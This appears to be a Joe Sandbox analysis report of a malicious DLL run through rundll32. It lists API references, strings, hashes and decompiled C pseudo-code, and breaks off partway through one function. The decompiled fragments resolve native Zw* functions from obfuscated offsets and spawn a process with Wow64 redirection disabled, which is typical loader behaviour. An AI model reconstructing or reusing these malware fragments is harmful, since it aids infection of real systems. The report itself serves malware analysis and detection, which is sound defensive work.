0x04443e5f
0x04443e01
0x04443e01
0x04443e06
0x04443e11
0x04443e17
0x00000000
0x04443e17
0x04443d58
0x04443d5f
0x04443d62
0x04443d67
0x04443d77
0x04443d7a
0x04443d80
0x04443d86
0x04443d8c
0x04443d8f
0x04443d95
0x04443d98
0x04443d9d
0x04443da1
0x04443da1
0x04443dad
0x04443db9
0x04443dbd
0x04443dbf
0x04443dc4
0x04443dc6
0x04443dcb
0x04443dd0
0x04443ddd
0x04443de5
0x04443de8
0x04443de8
0x04443dc4
0x00000000
0x04443daf
0x04443db3
0x04443dea
0x04443ded
0x04443df6
0x00000000
0x00000000
0x00000000
0x00000000
0x04443df6
0x04443db5
0x00000000
0x04443db5
0x04443dad

APIs

GetTickCount.KERNEL32 ref: 04443B52
wsprintfA.USER32 ref: 04443B9F
wsprintfA.USER32 ref: 04443BBC
wsprintfA.USER32 ref: 04443BDC
wsprintfA.USER32 ref: 04443BFA
wsprintfA.USER32 ref: 04443C1D
wsprintfA.USER32 ref: 04443C3E
wsprintfA.USER32 ref: 04443C5E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04443C8F
GetTickCount.KERNEL32 ref: 04443CA0
RtlEnterCriticalSection.NTDLL(053495F0), ref: 04443CB4
RtlLeaveCriticalSection.NTDLL(053495F0), ref: 04443CD2

Part of subcall function 044439E6: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,044470F6,00000000,05349630), ref: 04443A11
Part of subcall function 044439E6: lstrlen.KERNEL32(00000000,?,00000000,044470F6,00000000,05349630), ref: 04443A19
Part of subcall function 044439E6: strcpy.NTDLL ref: 04443A30
Part of subcall function 044439E6: lstrcat.KERNEL32(00000000,00000000), ref: 04443A3B
Part of subcall function 044439E6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,044470F6,?,00000000,044470F6,00000000,05349630), ref: 04443A58

StrTrimA.SHLWAPI(00000000,044492AC,?,05349630), ref: 04443D07

Part of subcall function 04445217: lstrlen.KERNEL32(0534887A,00000000,00000000,00000000,0444711D,00000000), ref: 04445227
Part of subcall function 04445217: lstrlen.KERNEL32(?), ref: 0444522F
Part of subcall function 04445217: lstrcpy.KERNEL32(00000000,0534887A), ref: 04445243
Part of subcall function 04445217: lstrcat.KERNEL32(00000000,?), ref: 0444524E

lstrcpy.KERNEL32(00000000,?), ref: 04443D27
lstrcat.KERNEL32(00000000,?), ref: 04443D39
lstrcat.KERNEL32(00000000,00000000), ref: 04443D3F

Part of subcall function 04442DDF: lstrlen.KERNEL32(?,00000000,05349CC0,7742C740,04442908,05349EC5,044464C9,044464C9,?,044464C9,?,69B25F44,E8FA7DD7,00000000), ref: 04442DE6
Part of subcall function 04442DDF: mbstowcs.NTDLL ref: 04442E0F
Part of subcall function 04442DDF: memset.NTDLL ref: 04442E21

wcstombs.NTDLL ref: 04443DD0

Part of subcall function 04447309: SysAllocString.OLEAUT32(00000000), ref: 0444734A

Part of subcall function 044430D1: RtlFreeHeap.NTDLL(00000000,00000000,0444337A,00000000,00000000,?,00000000,?,?,?,?,?,04442534,00000000,?,00000001), ref: 044430DD

HeapFree.KERNEL32(00000000,?,00000000), ref: 04443E11
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04443E21
HeapFree.KERNEL32(00000000,00000000,?,05349630), ref: 04443E31
HeapFree.KERNEL32(00000000,?), ref: 04443E41
HeapFree.KERNEL32(00000000,?), ref: 04443E4F

Strings

O!.c, xrefs: 04443B5F

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID: O!.c
API String ID: 972889839-67142254
Opcode ID: 3b8b7d74d9b4b59489d8d3de010413e00f4db616dd994efc77affcc9ba2ef5c8
Instruction ID: ee2cd22fe538446bd4cf5510390305f6e9c9fd687dd110a13f28bd5796af8640
Opcode Fuzzy Hash: 3b8b7d74d9b4b59489d8d3de010413e00f4db616dd994efc77affcc9ba2ef5c8
Instruction Fuzzy Hash: 52A15BB5600109AFFF11DF69DC88E9B7BA8FF88714B144026F909D7251DB39E950DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 702FA6EE, Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 431COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(7037C968), ref: 702FA6F3
OutputDebugStringA.KERNEL32(7032E0D8), ref: 702FA73F
OutputDebugStringA.KERNEL32(7032E0C8), ref: 702FA767
OutputDebugStringA.KERNEL32(7032E0C0), ref: 702FA772
OutputDebugStringA.KERNEL32(?), ref: 702FA77F
OutputDebugStringA.KERNEL32(7032931C), ref: 702FA78A
_wcscat_s.LIBCMTD ref: 702FA94A
_wcscat_s.LIBCMTD ref: 702FA982
_wcscpy_s.LIBCMTD ref: 702FAA62
__cftoe.LIBCMTD ref: 702FAADF
_wcscpy_s.LIBCMTD ref: 702FAB46
__itow_s.LIBCMTD ref: 702FA729

Part of subcall function 702F6FA0: _xtow_s@20.LIBCMTD ref: 702F6FCB

__strftime_l.LIBCMTD ref: 702FA7E9
_wcscpy_s.LIBCMTD ref: 702FA867
_wcscpy_s.LIBCMTD ref: 702FA8C3

Strings

t9j, xrefs: 702FAD75
PP, xrefs: 702FA8FC
t8j, xrefs: 702FAB1D

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: DebugOutputString$_wcscpy_s$_wcscat_s$IncrementInterlocked__cftoe__itow_s__strftime_l_xtow_s@20
String ID: PP$t8j$t9j
API String ID: 626255584-2618202768
Opcode ID: d8f043b3af7a7fe637600e9692d2fbb085099e9ec49ed1fa29c614e52a39336f
Instruction ID: 3fd73fd55ac6c305b3924371d49e5bf23898a1c688ebf575541af1bfda619b38
Opcode Fuzzy Hash: d8f043b3af7a7fe637600e9692d2fbb085099e9ec49ed1fa29c614e52a39336f
Instruction Fuzzy Hash: DA02A5B2E1021DAFDB11DF51DC46FDEB378AB04346F104199FA096A281D774BAA4CF94

Uniqueness

Uniqueness Score: -1.00%

Function 70303A96, Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 219COMMON

Download Yara Rule

APIs

_wcscpy_s.LIBCMTD ref: 70303ABD

Strings

X3p, xrefs: 70303B90
}8j, xrefs: 70303DA7
~y7p, xrefs: 70303CE9, 70303CEF
~y7p, xrefs: 70303D13, 70303D19
<3p, xrefs: 70303D0C, 70303D12
}*j, xrefs: 70303D6A
~y7p, xrefs: 70303D05, 70303D0B
D3p, xrefs: 70303BD5
~y7p, xrefs: 70303D2F, 70303D35, 70303D44
~y7p, xrefs: 70303CF7, 70303CFD
43p, xrefs: 70303D1A, 70303D20
(3p, xrefs: 70303CD3

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: _wcscpy_s
String ID: (3p$43p$<3p$D3p$X3p$}*j$}8j$~y7p$~y7p$~y7p$~y7p$~y7p
API String ID: 3225269332-2377149106
Opcode ID: e1369cb764316de3bdf05b205b5350ae5127ed8f998f11b879acc73600565361
Instruction ID: dda0c37f7907184167ba8dec8df489235c2cd786e50732ed6d0ebbb9d91e5fc7
Opcode Fuzzy Hash: e1369cb764316de3bdf05b205b5350ae5127ed8f998f11b879acc73600565361
Instruction Fuzzy Hash: 9F91C2B5E01208AFDB14CF54DD81BDEB77EAB48304F104199FA09BB284D774AA91CF91

Uniqueness

Uniqueness Score: -1.00%

Function 70303C90, Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 105windowCOMMON

Download Yara Rule

APIs

_wcscpy_s.LIBCMTD ref: 70303DD0
___crtMessageBoxW.LIBCMTD ref: 70303DF2

Strings

}8j, xrefs: 70303DA7
~y7p, xrefs: 70303CE9, 70303CEF
~y7p, xrefs: 70303D13, 70303D19
<3p, xrefs: 70303D0C, 70303D12
}*j, xrefs: 70303D6A
~y7p, xrefs: 70303D05, 70303D0B
~y7p, xrefs: 70303D2F, 70303D35, 70303D44
~y7p, xrefs: 70303CA5
~y7p, xrefs: 70303CF7, 70303CFD
43p, xrefs: 70303D1A, 70303D20
(3p, xrefs: 70303CD3

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: Message___crt_wcscpy_s
String ID: (3p$43p$<3p$}*j$}8j$~y7p$~y7p$~y7p$~y7p$~y7p$~y7p
API String ID: 2026042033-3674971350
Opcode ID: 3fd7be2519cf1d7f8a6dae0784c90db8710f4c35ea287bd0b540166644a142d6
Instruction ID: b5ef45e66490034149c9f2e710f44ee76a06e19408cbd0cf156b565fdf9b14d6
Opcode Fuzzy Hash: 3fd7be2519cf1d7f8a6dae0784c90db8710f4c35ea287bd0b540166644a142d6
Instruction Fuzzy Hash: 3C4160B5E41218AFDB25CB94DC81FDEB37AAB48740F0041D8F649BA284D774AA91CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0444602C, Relevance: 16.6, APIs: 11, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E0444602C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0x444a38c; // 0x5349bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E044414DE(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x44491ac;
				}
				_t46 = E0444525C(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04441EF5(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x444a2d4; // 0xefd5a8
						_t16 = _t75 + 0x444bab8; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E044414DE(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x44491b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04441EF5(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E044430D1(_v20);
						} else {
							_t66 =  *0x444a2d4; // 0xefd5a8
							_t31 = _t66 + 0x444bbd8; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E044430D1(_v12);
				}
				return _v24;
			}

0x04446034
0x0444603a
0x04446041
0x04446047
0x0444604b
0x0444604f
0x04446052
0x04446059
0x0444605c
0x0444605e
0x0444605e
0x04446067
0x0444606e
0x04446071
0x04446077
0x04446081
0x0444608a
0x04446091
0x044460aa
0x044460b1
0x044460b4
0x044460bd
0x044460c6
0x044460d7
0x044460e0
0x044460e4
0x044460e8
0x044460ef
0x044460f2
0x044460f4
0x044460f4
0x044460fe
0x04446107
0x0444610e
0x04446126
0x0444612a
0x04446167
0x0444612c
0x0444612f
0x04446137
0x04446148
0x04446154
0x0444615c
0x04446160
0x04446160
0x0444612a
0x0444616f
0x04446174
0x0444617b

APIs

GetTickCount.KERNEL32 ref: 04446041
lstrlen.KERNEL32(?,80000002,00000005), ref: 04446081
lstrlen.KERNEL32(00000000), ref: 0444608A
lstrlen.KERNEL32(00000000), ref: 04446091
lstrlenW.KERNEL32(80000002), ref: 0444609E
wsprintfW.USER32 ref: 044460D7
lstrlen.KERNEL32(?,00000004), ref: 044460FE
lstrlen.KERNEL32(?), ref: 04446107
lstrlen.KERNEL32(?), ref: 0444610E
lstrlenW.KERNEL32(?), ref: 04446115
wsprintfW.USER32 ref: 04446148

Part of subcall function 044430D1: RtlFreeHeap.NTDLL(00000000,00000000,0444337A,00000000,00000000,?,00000000,?,?,?,?,?,04442534,00000000,?,00000001), ref: 044430DD

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: lstrlen$wsprintf$CountFreeHeapTick
String ID:
API String ID: 822878831-0
Opcode ID: e4a7a226e647cbde89e32a18721e415ccb742c2e1ea2cffb8d73a2366dffdd76
Instruction ID: dfebb6090cd4a554da96f3237588817f61eb0300a00779aba3d9c9ee9c6e5710
Opcode Fuzzy Hash: e4a7a226e647cbde89e32a18721e415ccb742c2e1ea2cffb8d73a2366dffdd76
Instruction Fuzzy Hash: 8C415D76900219FFEF11AFA5CC08A9EBBB5EF84314F054055ED04B7211DB3AAE51EB90

Uniqueness

Uniqueness Score: -1.00%

Function 702FF400, Relevance: 15.1, APIs: 10, Instructions: 135COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 702FF40E

Part of subcall function 702FF690: _cmpBYTE.LIBCMTD ref: 702FF6C8

_cmpDWORD.LIBCMTD ref: 702FF435

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: c8f3e292c3b1e8bb93b3af797200ed8ae75d1eaad313a1fa08ee5c27a5052a11
Instruction ID: 0969dc35f2b9332b755f1c9d9b329ca82892e3774743d74d2406096f22611b22
Opcode Fuzzy Hash: c8f3e292c3b1e8bb93b3af797200ed8ae75d1eaad313a1fa08ee5c27a5052a11
Instruction Fuzzy Hash: 97511AB291010DFFCB45CFB8DA58A9DBBB9AF44244F508558E40AAB249EA34FF50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04445DD0, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E04445DD0(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E044471C2(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E04447801( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x444a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x444a2d4; // 0xefd5a8
					_t18 = _t50 + 0x444b55b; // 0x73797325
					_t52 = E04443F5B(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x444a2d4; // 0xefd5a8
						_t20 = _t53 + 0x444b73d; // 0x5348ce5
						_t21 = _t53 + 0x444b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x444a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E044430D1(_t76);
				goto L12;
			}

0x04445dd9
0x04445dd9
0x04445de7
0x04445df0
0x04445df3
0x04445f05
0x04445f0c
0x04445f0c
0x04445e02
0x04445e0a
0x04445e0f
0x04445e12
0x04445e27
0x04445e2d
0x04445e2e
0x04445e31
0x04445e37
0x04445e3a
0x04445e3f
0x04445e47
0x04445e4e
0x04445e55
0x04445e58
0x04445eec
0x04445e5e
0x04445e5e
0x04445e63
0x04445e6a
0x04445e7e
0x04445e82
0x04445ed3
0x04445e84
0x04445e84
0x04445e8b
0x04445e92
0x04445eaa
0x04445eb0
0x04445eb4
0x04445ece
0x04445eb6
0x04445ebf
0x04445ec4
0x04445ec4
0x04445eb4
0x04445ee4
0x04445ee4
0x04445e58
0x04445ef3
0x04445efc
0x04445f00
0x00000000

APIs

Part of subcall function 044471C2: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,04445DEC,?,?,?,?,00000000,00000000), ref: 044471E7
Part of subcall function 044471C2: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04447209
Part of subcall function 044471C2: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0444721F
Part of subcall function 044471C2: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04447235
Part of subcall function 044471C2: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0444724B
Part of subcall function 044471C2: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04447261

memset.NTDLL ref: 04445E3A

Part of subcall function 04443F5B: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,04445E53,73797325), ref: 04443F6C
Part of subcall function 04443F5B: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04443F86

GetModuleHandleA.KERNEL32(4E52454B,05348CE5,73797325), ref: 04445E71
GetProcAddress.KERNEL32(00000000), ref: 04445E78
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 04445E92
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04445EB0
CloseHandle.KERNEL32(00000000), ref: 04445EBF
CloseHandle.KERNEL32(?), ref: 04445EC4
GetLastError.KERNEL32 ref: 04445EC8
HeapFree.KERNEL32(00000000,?), ref: 04445EE4

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 91923200-0
Opcode ID: 268a681791ebc480d04ed6143cdadea2e46e448b4c3368c717933ec91567546f
Instruction ID: 54bc435f2360ccee8487d96ea476a3cca42699632cafee4198f1a766caa39a33
Opcode Fuzzy Hash: 268a681791ebc480d04ed6143cdadea2e46e448b4c3368c717933ec91567546f
Instruction Fuzzy Hash: 1E313B76A00219FFEF119FA4D8489DFBFB8FF88354F204066E605A3211D775AA45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 702FBA97, Relevance: 13.6, APIs: 9, Instructions: 105COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 702FBA9E

Part of subcall function 702F9620: TlsGetValue.KERNEL32(7037C750,?,702F9B0C), ref: 702F9635
Part of subcall function 702F9620: TlsGetValue.KERNEL32(7037C750,7037C74C,?,702F9B0C), ref: 702F9656
Part of subcall function 702F9620: __crt_wait_module_handle.LIBCMTD ref: 702F966C
Part of subcall function 702F9620: GetProcAddress.KERNEL32(00000000,7032DA4C), ref: 702F9686

__encode_pointer.LIBCMTD ref: 702FBB22
__encode_pointer.LIBCMTD ref: 702FBABA

Part of subcall function 702F9600: __encode_pointer.LIBCMTD ref: 702F9607

__encode_pointer.LIBCMTD ref: 702FBB41
__encode_pointer.LIBCMTD ref: 702FBB52
__initterm.LIBCMTD ref: 702FBB94
__initterm.LIBCMTD ref: 702FBBA6
__CrtSetDbgFlag.LIBCMTD ref: 702FBBB9
___freeCrtMemory.LIBCMTD ref: 702FBBD0

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: __encode_pointer$Value__initterm$AddressFlagMemoryProc___free__crt_wait_module_handle
String ID:
API String ID: 2279937687-0
Opcode ID: 4ea04a2057c24ad329aa948be32fece8f22640d4d9c68fe91e461f2c5f90ba11
Instruction ID: 5d17e861dabff3bcebbf9421d5aafcc3c0f240156094c2f27f1f46c9875cdbae
Opcode Fuzzy Hash: 4ea04a2057c24ad329aa948be32fece8f22640d4d9c68fe91e461f2c5f90ba11
Instruction Fuzzy Hash: 7441F4B6D0020D9FDF02CFA5D885BDEF7B6AB48258F204129E816B7244D735B961CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 702FF1A8, Relevance: 12.1, APIs: 8, Instructions: 103COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 702FF1B6

Part of subcall function 702FF690: _cmpBYTE.LIBCMTD ref: 702FF6C8

_cmpDWORD.LIBCMTD ref: 702FF1DD

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 000ccbe2cadb759e74cd5e7df1b3dfedffdf27a34ef9d4f6f82d792d1a5bf3d5
Instruction ID: d98b94a95301147ea4899100bfa9954e1c3af082524967dae6fbde5af818e858
Opcode Fuzzy Hash: 000ccbe2cadb759e74cd5e7df1b3dfedffdf27a34ef9d4f6f82d792d1a5bf3d5
Instruction Fuzzy Hash: 37313E7691010CFFCB45DFBCDA48A9DBB79AF44244F508158E80AAB249EA34FF50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 702FF2D4, Relevance: 12.1, APIs: 8, Instructions: 103COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 702FF2E2

Part of subcall function 702FF690: _cmpBYTE.LIBCMTD ref: 702FF6C8

_cmpDWORD.LIBCMTD ref: 702FF309

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 19dc914e4a0633765d336c19ed3a3f14afb2883500002485b60d4641ba5bd03d
Instruction ID: db16e0e7c7be0f3d7273719bc8d63b8532165b797d438b1b639a210c0a667baf
Opcode Fuzzy Hash: 19dc914e4a0633765d336c19ed3a3f14afb2883500002485b60d4641ba5bd03d
Instruction Fuzzy Hash: FC311A7291010CFFCB55DFBCDA48A9DBB79AF44284F608158E80AAB249DA34FF54DB50

Uniqueness

Uniqueness Score: -1.00%

Function 702F1FF5, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 243memoryCOMMON

Download Yara Rule

APIs

_CheckBytes.LIBCMTD ref: 702F2009
__CrtIsValidHeapPointer.LIBCMTD ref: 702F2095
_CheckBytes.LIBCMTD ref: 702F2140
_CheckBytes.LIBCMTD ref: 702F21FA
__free_base.LIBCMTD ref: 702F22FD

Strings

tDj, xrefs: 702F204B

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: BytesCheck$HeapPointerValid__free_base
String ID: tDj
API String ID: 1224754439-2513116121
Opcode ID: d48dd96e5b46d2afc1d7aa87068c493fa87c0593e372d9b878ddeb7a797910b7
Instruction ID: 60593604ec7c62b6247a721d1888b7dbee8197de869ecf33f2cf7203a8895a11
Opcode Fuzzy Hash: d48dd96e5b46d2afc1d7aa87068c493fa87c0593e372d9b878ddeb7a797910b7
Instruction Fuzzy Hash: 5181B076A40209AFE714CF44DD92F6EB37AAB59304F304248F609AE2C2D671FE55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 702FF090, Relevance: 10.6, APIs: 7, Instructions: 96COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 702FF09E

Part of subcall function 702FF690: _cmpBYTE.LIBCMTD ref: 702FF6C8

_cmpDWORD.LIBCMTD ref: 702FF0C5

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 78c03d3718f2390d31f8b063bc65ce1d810f83c356c66c6654849dcd724319e6
Instruction ID: ceb4492786b7c1506bbc310a676cd05d4c90d4f24acaddf7ea1e9abe3ae69b4c
Opcode Fuzzy Hash: 78c03d3718f2390d31f8b063bc65ce1d810f83c356c66c6654849dcd724319e6
Instruction Fuzzy Hash: E3310D7291010CFFCB45DFB8DA48A9DBB78AF44245F508158E80ABB259DA34FF54DB50

Uniqueness

Uniqueness Score: -1.00%

Function 044471C2, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044471C2(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04441EF5(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x444a2d4; // 0xefd5a8
					_t1 = _t23 + 0x444b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x444a2d4; // 0xefd5a8
					_t2 = _t26 + 0x444b787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E044430D1(_t54);
					} else {
						_t30 =  *0x444a2d4; // 0xefd5a8
						_t5 = _t30 + 0x444b774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x444a2d4; // 0xefd5a8
							_t7 = _t33 + 0x444b797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x444a2d4; // 0xefd5a8
								_t9 = _t36 + 0x444b756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x444a2d4; // 0xefd5a8
									_t11 = _t39 + 0x444b7ac; // 0x6c43775a
